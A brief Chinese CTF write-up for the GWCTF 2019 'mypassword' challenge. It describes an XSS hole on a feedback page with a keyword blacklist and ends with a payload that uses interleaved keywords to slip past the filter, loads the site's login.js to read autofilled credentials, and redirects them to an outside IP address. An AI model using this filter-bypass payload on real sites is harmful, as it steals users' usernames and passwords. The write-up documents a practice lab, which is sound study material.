[GWCTF 2019]mypassword.md

/login.php

/register.php

username: a
password: 1
/index.php

/feedback.php

/list.php

没有什么思路.jpg

/feedback.php下发现了奇怪的东西

像是XSS的样子,还自带了一个方便绕过的黑名单,感动

但是利用方式完全不知晓,毕竟不知道账号密码什么的到底放哪了

看了wp,发现居然漏掉了login页面的审计,大意了qaq

通过login.js来实现自动填充密码的功能

这样就知道了明文账密的位置,但由于cookie在黑名单的最后一个,无法通过插入处于自己后面的关键词绕过,所以再来一波借刀杀人,拿login.js来获取账密

<inscriptput type="text" name="username">
<inscriptput type="password" name="password">
<sciframeript srgetElementc="./js/login.js"></sciframeript>
<sciframeript>
	var username = docookiecument.gedocumenttElementsByName("username")[0].value;
	var password = docookiecument.gedocumenttElementsByName("password")[0].value;
	docookiecument.losvgcation = "http://193.111.30.158:2333?info=" + username + "|" + password;
</sciframeript>

#Web #PHP #js #XSS #bypass